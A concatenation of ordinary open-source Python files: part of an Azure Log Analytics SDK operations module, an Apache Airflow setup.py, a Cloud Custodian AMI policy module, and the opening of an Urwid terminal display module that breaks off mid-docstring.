url=url,
params=query_parameters,
**kwargs
)
def build_get_request(
resource_group_name: str,
workspace_name: str,
data_source_name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
api_version = "2020-08-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/workspaces/{workspaceName}/dataSources/{dataSourceName}')
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
"workspaceName": _SERIALIZER.url("workspace_name", workspace_name, 'str', max_length=63, min_length=4, pattern=r'^[A-Za-z0-9][A-Za-z0-9-]+[A-Za-z0-9]$'),
"dataSourceName": _SERIALIZER.url("data_source_name", data_source_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_list_by_workspace_request(
resource_group_name: str,
workspace_name: str,
subscription_id: str,
*,
filter: str,
skiptoken: Optional[str] = None,
**kwargs: Any
) -> HttpRequest:
api_version = "2020-08-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/workspaces/{workspaceName}/dataSources')
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
"workspaceName": _SERIALIZER.url("workspace_name", workspace_name, 'str', max_length=63, min_length=4, pattern=r'^[A-Za-z0-9][A-Za-z0-9-]+[A-Za-z0-9]$'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['$filter'] = _SERIALIZER.query("filter", filter, 'str')
if skiptoken is not None:
query_parameters['$skiptoken'] = _SERIALIZER.query("skiptoken", skiptoken, 'str')
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
class DataSourcesOperations(object):
"""DataSourcesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.loganalytics.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def create_or_update(
self,
resource_group_name: str,
workspace_name: str,
data_source_name: str,
parameters: "_models.DataSource",
**kwargs: Any
) -> "_models.DataSource":
"""Create or update a data source.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param data_source_name: The name of the datasource resource.
:type data_source_name: str
:param parameters: The parameters required to create or update a datasource.
:type parameters: ~azure.mgmt.loganalytics.models.DataSource
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DataSource, or the result of cls(response)
:rtype: ~azure.mgmt.loganalytics.models.DataSource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DataSource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'DataSource')
request = build_create_or_update_request(
resource_group_name=resource_group_name,
workspace_name=workspace_name,
data_source_name=data_source_name,
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self.create_or_update.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('DataSource', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('DataSource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/workspaces/{workspaceName}/dataSources/{dataSourceName}'} # type: ignore
@distributed_trace
def delete(
self,
resource_group_name: str,
workspace_name: str,
data_source_name: str,
**kwargs: Any
) -> None:
"""Deletes a data source instance.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param data_source_name: Name of the datasource.
:type data_source_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_request(
resource_group_name=resource_group_name,
workspace_name=workspace_name,
data_source_name=data_source_name,
subscription_id=self._config.subscription_id,
template_url=self.delete.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/workspaces/{workspaceName}/dataSources/{dataSourceName}'} # type: ignore
@distributed_trace
def get(
self,
resource_group_name: str,
workspace_name: str,
data_source_name: str,
**kwargs: Any
) -> "_models.DataSource":
"""Gets a datasource instance.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param data_source_name: Name of the datasource.
:type data_source_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DataSource, or the result of cls(response)
:rtype: ~azure.mgmt.loganalytics.models.DataSource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DataSource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
resource_group_name=resource_group_name,
workspace_name=workspace_name,
data_source_name=data_source_name,
subscription_id=self._config.subscription_id,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('DataSource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/workspaces/{workspaceName}/dataSources/{dataSourceName}'} # type: ignore
@distributed_trace
def list_by_workspace(
self,
resource_group_name: str,
workspace_name: str,
filter: str,
skiptoken: Optional[str] = None,
**kwargs: Any
) -> Iterable["_models.DataSourceListResult"]:
"""Gets the first page of data source instances in a workspace with the link to the next page.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param filter: The filter to apply on the operation.
:type filter: str
:param skiptoken: Starting point of the collection of data source instances.
:type skiptoken: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DataSourceListResult or the result of
cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.loganalytics.models.DataSourceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DataSourceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_workspace_request(
resource_group_name=resource_group_name,
workspace_name=workspace_name,
subscription_id=self._config.subscription_id,
filter=filter,
skiptoken=skiptoken,
template_url=self.list_by_workspace.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_by_workspace_request(
resource_group_name=resource_group_name,
workspace_name=workspace_name,
subscription_id=self._config.subscription_id,
filter=filter,
skiptoken=skiptoken,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("DataSourceListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_workspace.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/workspaces/{workspaceName}/dataSources'} # type: ignore
| |
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup, find_packages, Command
from setuptools.command.test import test as TestCommand
import imp
import logging
import os
import pip
import sys
logger = logging.getLogger(__name__)
# Kept manually in sync with airflow.__version__
version = imp.load_source(
'airflow.version', os.path.join('airflow', 'version.py')).version
class Tox(TestCommand):
user_options = [('tox-args=', None, "Arguments to pass to tox")]
def initialize_options(self):
TestCommand.initialize_options(self)
self.tox_args = ''
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
#import here, cause outside the eggs aren't loaded
import tox
errno = tox.cmdline(args=self.tox_args.split())
sys.exit(errno)
class CleanCommand(Command):
"""Custom clean command to tidy up the project root."""
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
os.system('rm -vrf ./build ./dist ./*.pyc ./*.tgz ./*.egg-info')
def git_version(version):
"""
Return a version to identify the state of the underlying git repo. The version will
indicate whether the head of the current git-backed working directory is tied to a
release tag or not : it will indicate the former with a 'release:{version}' prefix
and the latter with a 'dev0' prefix. Following the prefix will be a sha of the current
branch head. Finally, a "dirty" suffix is appended to indicate that uncommitted changes
are present.
"""
repo = None
try:
import git
repo = git.Repo('.git')
except ImportError:
logger.warning('gitpython not found: Cannot compute the git version.')
return ''
except Exception as e:
logger.warning('Git repo not found: Cannot compute the git version.')
return ''
if repo:
sha = repo.head.commit.hexsha
if repo.is_dirty():
return '.dev0+{sha}.dirty'.format(sha=sha)
# commit is clean
# is it release of `version` ?
try:
tag = repo.git.describe(
match='[0-9]*', exact_match=True,
tags=True, dirty=True)
assert tag == version, (tag, version)
return '.release:{version}+{sha}'.format(version=version,
sha=sha)
except git.GitCommandError:
return '.dev0+{sha}'.format(sha=sha)
else:
return 'no_git_version'
def write_version(filename=os.path.join(*['airflow',
'git_version'])):
text = "{}".format(git_version(version))
with open(filename, 'w') as a:
a.write(text)
async = [
'greenlet>=0.4.9',
'eventlet>= 0.9.7',
'gevent>=0.13'
]
azure = ['azure-storage>=0.34.0']
sendgrid = ['sendgrid>=5.2.0']
celery = [
'celery>=4.0.0',
'flower>=0.7.3'
]
cgroups = [
'cgroupspy>=0.1.4',
]
crypto = ['cryptography>=0.9.3']
dask = [
'distributed>=1.15.2, <2'
]
databricks = ['requests>=2.5.1, <3']
datadog = ['datadog>=0.14.0']
doc = [
'sphinx>=1.2.3',
'sphinx-argparse>=0.1.13',
'sphinx-rtd-theme>=0.1.6',
'Sphinx-PyPI-upload>=0.2.1'
]
docker = ['docker-py>=1.6.0']
emr = ['boto3>=1.0.0']
gcp_api = [
'httplib2',
'google-api-python-client>=1.5.0, <1.6.0',
'oauth2client>=2.0.2, <2.1.0',
'PyOpenSSL',
'google-cloud-dataflow',
'pandas-gbq'
]
hdfs = ['snakebite>=2.7.8']
webhdfs = ['hdfs[dataframe,avro,kerberos]>=2.0.4']
jira = ['JIRA>1.0.7']
hive = [
'hive-thrift-py>=0.0.1',
'pyhive>=0.1.3',
'impyla>=0.13.3',
'unicodecsv>=0.14.1'
]
jdbc = ['jaydebeapi>=1.1.1']
mssql = ['pymssql>=2.1.1', 'unicodecsv>=0.14.1']
mysql = ['mysqlclient>=1.3.6']
rabbitmq = ['librabbitmq>=1.6.1']
oracle = ['cx_Oracle>=5.1.2']
postgres = ['psycopg2>=2.7.1']
ssh = ['paramiko>=2.1.1']
salesforce = ['simple-salesforce>=0.72']
s3 = ['boto3>=1.0.0']
samba = ['pysmbclient>=0.1.3']
slack = ['slackclient>=1.0.0']
statsd = ['statsd>=3.0.1, <4.0']
vertica = ['vertica-python>=0.5.1']
ldap = ['ldap3>=0.9.9.1']
kerberos = ['pykerberos>=1.1.13',
'requests_kerberos>=0.10.0',
'thrift_sasl>=0.2.0',
'snakebite[kerberos]>=2.7.8',
'kerberos>=1.2.5']
password = [
'bcrypt>=2.0.0',
'flask-bcrypt>=0.7.1',
]
github_enterprise = ['Flask-OAuthlib>=0.9.1']
qds = ['qds-sdk>=1.9.6']
cloudant = ['cloudant>=0.5.9,<2.0'] # major update coming soon, clamp to 0.x
redis = ['redis>=2.10.5']
all_dbs = postgres + mysql + hive + mssql + hdfs + vertica + cloudant
devel = [
'click',
'freezegun',
'jira',
'lxml>=3.3.4',
'mock',
'moto==1.1.19',
'nose',
'nose-ignore-docstring==0.2',
'nose-timer',
'parameterized',
'qds-sdk>=1.9.6',
'rednose',
'paramiko',
'requests_mock'
]
devel_minreq = devel + mysql + doc + password + s3 + cgroups
devel_hadoop = devel_minreq + hive + hdfs + webhdfs + kerberos
devel_all = devel + all_dbs + doc + samba + s3 + slack + crypto + oracle + docker + ssh
def do_setup():
write_version()
setup(
name='apache-airflow',
description='Programmatically author, schedule and monitor data pipelines',
license='Apache License 2.0',
version=version,
packages=find_packages(exclude=['tests*']),
package_data={'': ['airflow/alembic.ini', "airflow/git_version"]},
include_package_data=True,
zip_safe=False,
scripts=['airflow/bin/airflow'],
install_requires=[
'alembic>=0.8.3, <0.9',
'bleach==2.1.2',
'configparser>=3.5.0, <3.6.0',
'croniter>=0.3.17, <0.4',
'dill>=0.2.2, <0.3',
'flask>=0.11, <0.12',
'flask-admin==1.4.1',
'flask-cache>=0.13.1, <0.14',
'flask-login==0.2.11',
'flask-swagger==0.2.13',
'flask-wtf==0.14',
'funcsigs==1.0.0',
'future>=0.16.0, <0.17',
'gitpython>=2.0.2',
'gunicorn>=19.4.0, <20.0',
'iso8601>=0.1.12',
'jinja2>=2.7.3, <2.9.0',
'lxml>=3.6.0, <4.0',
'markdown>=2.5.2, <3.0',
'pandas>=0.17.1, <1.0.0',
'pendulum==1.3.2',
'psutil>=4.2.0, <5.0.0',
'pygments>=2.0.1, <3.0',
'python-daemon>=2.1.1, <2.2',
'python-dateutil>=2.3, <3',
'python-nvd3==0.14.2',
'requests>=2.5.1, <3',
'setproctitle>=1.1.8, <2',
'sqlalchemy>=0.9.8',
'sqlalchemy-utc>=0.9.0',
'tabulate>=0.7.5, <0.8.0',
'thrift>=0.9.2',
'tzlocal>=1.4',
'zope.deprecation>=4.0, <5.0',
],
setup_requires=[
'docutils>=0.14, <1.0',
],
extras_require={
'all': devel_all,
'all_dbs': all_dbs,
'async': async,
'azure': azure,
'celery': celery,
'cgroups': cgroups,
'cloudant': cloudant,
'crypto': crypto,
'dask': dask,
'databricks': databricks,
'datadog': datadog,
'devel': devel_minreq,
'devel_hadoop': devel_hadoop,
'doc': doc,
'docker': docker,
'emr': emr,
'gcp_api': gcp_api,
'github_enterprise': github_enterprise,
'hdfs': hdfs,
'hive': hive,
'jdbc': jdbc,
'kerberos': kerberos,
'ldap': ldap,
'mssql': mssql,
'mysql': mysql,
'oracle': oracle,
'password': password,
'postgres': postgres,
'qds': qds,
'rabbitmq': rabbitmq,
's3': s3,
'salesforce': salesforce,
'samba': samba,
'sendgrid' : sendgrid,
'slack': slack,
'ssh': ssh,
'statsd': statsd,
'vertica': vertica,
'webhdfs': webhdfs,
'jira': jira,
'redis': redis,
},
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
'Topic :: System :: Monitoring',
],
author='Apache Software Foundation',
author_email='dev@airflow.incubator.apache.org',
url='http://airflow.incubator.apache.org/',
download_url=(
'https://dist.apache.org/repos/dist/release/incubator/airflow/' + version),
cmdclass={
'test': Tox,
'extra_clean': CleanCommand,
},
)
if __name__ == "__main__":
do_setup()
| |
# Copyright 2015-2019 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function, unicode_literals
import itertools
import logging
from concurrent.futures import as_completed
import jmespath
from c7n.actions import BaseAction
from c7n.exceptions import ClientError
from c7n.filters import (
AgeFilter, Filter, CrossAccountAccessFilter)
from c7n.manager import resources
from c7n.query import QueryResourceManager, DescribeSource, TypeInfo
from c7n.resolver import ValuesFrom
from c7n.utils import local_session, type_schema, chunks
log = logging.getLogger('custodian.ami')
@resources.register('ami')
class AMI(QueryResourceManager):
class resource_type(TypeInfo):
service = 'ec2'
arn_type = 'image'
enum_spec = (
'describe_images', 'Images', None)
id = 'ImageId'
filter_name = 'ImageIds'
filter_type = 'list'
name = 'Name'
date = 'CreationDate'
def resources(self, query=None):
query = query or {}
if query.get('Owners') is None:
query['Owners'] = ['self']
return super(AMI, self).resources(query=query)
def get_source(self, source_type):
if source_type == 'describe':
return DescribeImageSource(self)
return super(AMI, self).get_source(source_type)
class DescribeImageSource(DescribeSource):
def get_resources(self, ids, cache=True):
while ids:
try:
return super(DescribeImageSource, self).get_resources(ids, cache)
except ClientError as e:
bad_ami_ids = ErrorHandler.extract_bad_ami(e)
if bad_ami_ids:
for b in bad_ami_ids:
ids.remove(b)
continue
raise
return []
class ErrorHandler(object):
@staticmethod
def extract_bad_ami(e):
"""Handle various client side errors when describing images"""
msg = e.response['Error']['Message']
error = e.response['Error']['Code']
e_ami_ids = None
if error == 'InvalidAMIID.NotFound':
e_ami_ids = [
e_ami_id.strip() for e_ami_id
in msg[msg.find("'[") + 2:msg.rfind("]'")].split(',')]
log.warning("Image not found %s" % e_ami_ids)
elif error == 'InvalidAMIID.Malformed':
e_ami_ids = [msg[msg.find('"') + 1:msg.rfind('"')]]
log.warning("Image id malformed %s" % e_ami_ids)
return e_ami_ids
@AMI.action_registry.register('deregister')
class Deregister(BaseAction):
"""Action to deregister AMI
To prevent deregistering all AMI, it is advised to use in conjunction with
a filter (such as image-age)
:example:
.. code-block:: yaml
policies:
- name: ami-deregister-old
resource: ami
filters:
- type: image-age
days: 90
actions:
- deregister
"""
schema = type_schema('deregister', **{'delete-snapshots': {'type': 'boolean'}})
permissions = ('ec2:DeregisterImage',)
snap_expr = jmespath.compile('BlockDeviceMappings[].Ebs.SnapshotId')
def process(self, images):
client = local_session(self.manager.session_factory).client('ec2')
image_count = len(images)
images = [i for i in images if self.manager.ctx.options.account_id == i['OwnerId']]
if len(images) != image_count:
self.log.info("Implicitly filtered %d non owned images", image_count - len(images))
for i in images:
self.manager.retry(client.deregister_image, ImageId=i['ImageId'])
if not self.data.get('delete-snapshots'):
continue
snap_ids = self.snap_expr.search(i) or ()
for s in snap_ids:
try:
self.manager.retry(client.delete_snapshot, SnapshotId=s)
except ClientError as e:
if e.error['Code'] == 'InvalidSnapshot.InUse':
continue
@AMI.action_registry.register('remove-launch-permissions')
class RemoveLaunchPermissions(BaseAction):
"""Action to remove the ability to launch an instance from an AMI
This action will remove any launch permissions granted to other
AWS accounts from the image, leaving only the owner capable of
launching it
:example:
.. code-block:: yaml
policies:
- name: ami-stop-share-old
resource: ami
filters:
- type: image-age
days: 60
actions:
- remove-launch-permissions
"""
schema = type_schema('remove-launch-permissions')
permissions = ('ec2:ResetImageAttribute',)
def process(self, images):
client = local_session(self.manager.session_factory).client('ec2')
for i in images:
self.process_image(client, i)
def process_image(self, client, image):
client.reset_image_attribute(
ImageId=image['ImageId'], Attribute="launchPermission")
@AMI.action_registry.register('copy')
class Copy(BaseAction):
"""Action to copy AMIs with optional encryption
This action can copy AMIs while optionally encrypting or decrypting
the target AMI. It is advised to use in conjunction with a filter.
Note there is a max in flight of 5 per account/region.
:example:
.. code-block:: yaml
policies:
- name: ami-ensure-encrypted
resource: ami
filters:
- type: value
key: encrypted
value: true
actions:
- type: copy
encrypt: true
key-id: 00000000-0000-0000-0000-000000000000
"""
permissions = ('ec2:CopyImage',)
schema = {
'type': 'object',
'additionalProperties': False,
'properties': {
'type': {'enum': ['copy']},
'name': {'type': 'string'},
'description': {'type': 'string'},
'region': {'type': 'string'},
'encrypt': {'type': 'boolean'},
'key-id': {'type': 'string'}
}
}
def process(self, images):
session = local_session(self.manager.session_factory)
client = session.client(
'ec2',
region_name=self.data.get('region', None))
for image in images:
client.copy_image(
Name=self.data.get('name', image['Name']),
Description=self.data.get('description', image['Description']),
SourceRegion=session.region_name,
SourceImageId=image['ImageId'],
Encrypted=self.data.get('encrypt', False),
KmsKeyId=self.data.get('key-id', ''))
@AMI.filter_registry.register('image-age')
class ImageAgeFilter(AgeFilter):
"""Filters images based on the age (in days)
:example:
.. code-block:: yaml
policies:
- name: ami-remove-launch-permissions
resource: ami
filters:
- type: image-age
days: 30
"""
date_attribute = "CreationDate"
schema = type_schema(
'image-age',
op={'$ref': '#/definitions/filters_common/comparison_operators'},
days={'type': 'number', 'minimum': 0})
@AMI.filter_registry.register('unused')
class ImageUnusedFilter(Filter):
"""Filters images based on usage
true: image has no instances spawned from it
false: image has instances spawned from it
:example:
.. code-block:: yaml
policies:
- name: ami-unused
resource: ami
filters:
- type: unused
value: true
"""
schema = type_schema('unused', value={'type': 'boolean'})
def get_permissions(self):
return list(itertools.chain(*[
self.manager.get_resource_manager(m).get_permissions()
for m in ('asg', 'launch-config', 'ec2')]))
def _pull_asg_images(self):
asgs = self.manager.get_resource_manager('asg').resources()
image_ids = set()
lcfgs = set(a['LaunchConfigurationName'] for a in asgs if 'LaunchConfigurationName' in a)
lcfg_mgr = self.manager.get_resource_manager('launch-config')
if lcfgs:
image_ids.update([
lcfg['ImageId'] for lcfg in lcfg_mgr.resources()
if lcfg['LaunchConfigurationName'] in lcfgs])
tmpl_mgr = self.manager.get_resource_manager('launch-template-version')
for tversion in tmpl_mgr.get_resources(
list(tmpl_mgr.get_asg_templates(asgs).keys())):
image_ids.add(tversion['LaunchTemplateData'].get('ImageId'))
return image_ids
def _pull_ec2_images(self):
ec2_manager = self.manager.get_resource_manager('ec2')
return set([i['ImageId'] for i in ec2_manager.resources()])
def process(self, resources, event=None):
images = self._pull_ec2_images().union(self._pull_asg_images())
if self.data.get('value', True):
return [r for r in resources if r['ImageId'] not in images]
return [r for r in resources if r['ImageId'] in images]
@AMI.filter_registry.register('cross-account')
class AmiCrossAccountFilter(CrossAccountAccessFilter):
schema = type_schema(
'cross-account',
# white list accounts
whitelist_from=ValuesFrom.schema,
whitelist={'type': 'array', 'items': {'type': 'string'}})
permissions = ('ec2:DescribeImageAttribute',)
def process_resource_set(self, client, accounts, resource_set):
results = []
for r in resource_set:
attrs = self.manager.retry(
client.describe_image_attribute,
ImageId=r['ImageId'],
Attribute='launchPermission')['LaunchPermissions']
image_accounts = {a.get('Group') or a.get('UserId') for a in attrs}
delta_accounts = image_accounts.difference(accounts)
if delta_accounts:
r['c7n:CrossAccountViolations'] = list(delta_accounts)
results.append(r)
return results
def process(self, resources, event=None):
results = []
client = local_session(self.manager.session_factory).client('ec2')
accounts = self.get_accounts()
with self.executor_factory(max_workers=2) as w:
futures = []
for resource_set in chunks(resources, 20):
futures.append(
w.submit(
self.process_resource_set, client, accounts, resource_set))
for f in as_completed(futures):
if f.exception():
self.log.error(
"Exception checking cross account access \n %s" % (
f.exception()))
continue
results.extend(f.result())
return results
| |
#!/usr/bin/python
#
# Urwid raw display module
# Copyright (C) 2004-2009 Ian Ward
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Urwid web site: http://excess.org/urwid/
"""
Direct terminal UI implementation
"""
import os
import select
import struct
import sys
import signal
try:
import fcntl
import termios
import tty
except ImportError:
pass # windows
from urwid import util
from urwid import escape
from urwid.display_common import BaseScreen, RealTerminal, \
UPDATE_PALETTE_ENTRY, AttrSpec, UNPRINTABLE_TRANS_TABLE, \
INPUT_DESCRIPTORS_CHANGED
from urwid import signals
from urwid.compat import PYTHON3, bytes, B
from subprocess import Popen, PIPE
class Screen(BaseScreen, RealTerminal):
def __init__(self, input=sys.stdin, output=sys.stdout):
"""Initialize a screen that directly prints escape codes to an output
terminal.
"""
super(Screen, self).__init__()
self._pal_escape = {}
self._pal_attrspec = {}
signals.connect_signal(self, UPDATE_PALETTE_ENTRY,
self._on_update_palette_entry)
self.colors = 16 # FIXME: detect this
self.has_underline = True # FIXME: detect this
self.register_palette_entry( None, 'default','default')
self._keyqueue = []
self.prev_input_resize = 0
self.set_input_timeouts()
self.screen_buf = None
self._screen_buf_canvas = None
self._resized = False
self.maxrow = None
self.gpm_mev = None
self.gpm_event_pending = False
self._mouse_tracking_enabled = False
self.last_bstate = 0
self._setup_G1_done = False
self._rows_used = None
self._cy = 0
term = os.environ.get('TERM', '')
self.fg_bright_is_bold = not term.startswith("xterm")
self.bg_bright_is_blink = (term == "linux")
self.back_color_erase = not term.startswith("screen")
self._next_timeout = None
# Our connections to the world
self._term_output_file = output
self._term_input_file = input
# pipe for signalling external event loops about resize events
self._resize_pipe_rd, self._resize_pipe_wr = os.pipe()
fcntl.fcntl(self._resize_pipe_rd, fcntl.F_SETFL, os.O_NONBLOCK)
def _on_update_palette_entry(self, name, *attrspecs):
# copy the attribute to a dictionary containing the escape seqences
a = attrspecs[{16:0,1:1,88:2,256:3}[self.colors]]
self._pal_attrspec[name] = a
self._pal_escape[name] = self._attrspec_to_escape(a)
def set_input_timeouts(self, max_wait=None, complete_wait=0.125,
resize_wait=0.125):
"""
Set the get_input timeout values. All values are in floating
point numbers of seconds.
max_wait -- amount of time in seconds to wait for input when
there is no input pending, wait forever if None
complete_wait -- amount of time in seconds to wait when
get_input detects an incomplete escape sequence at the
end of the available input
resize_wait -- amount of time in seconds to wait for more input
after receiving two screen resize requests in a row to
stop Urwid from consuming 100% cpu during a gradual
window resize operation
"""
self.max_wait = max_wait
if max_wait is not None:
if self._next_timeout is None:
self._next_timeout = max_wait
else:
self._next_timeout = min(self._next_timeout, self.max_wait)
self.complete_wait = complete_wait
self.resize_wait = resize_wait
def _sigwinch_handler(self, signum, frame):
if not self._resized:
os.write(self._resize_pipe_wr, B('R'))
self._resized = True
self.screen_buf = None
def _sigcont_handler(self, signum, frame):
self.stop()
self.start()
self._sigwinch_handler(None, None)
def signal_init(self):
"""
Called in the startup of run wrapper to set the SIGWINCH
and SIGCONT signal handlers.
Override this function to call from main thread in threaded
applications.
"""
signal.signal(signal.SIGWINCH, self._sigwinch_handler)
signal.signal(signal.SIGCONT, self._sigcont_handler)
def signal_restore(self):
"""
Called in the finally block of run wrapper to restore the
SIGWINCH and SIGCONT signal handlers.
Override this function to call from main thread in threaded
applications.
"""
signal.signal(signal.SIGCONT, signal.SIG_DFL)
signal.signal(signal.SIGWINCH, signal.SIG_DFL)
def set_mouse_tracking(self, enable=True):
"""
Enable (or disable) mouse tracking.
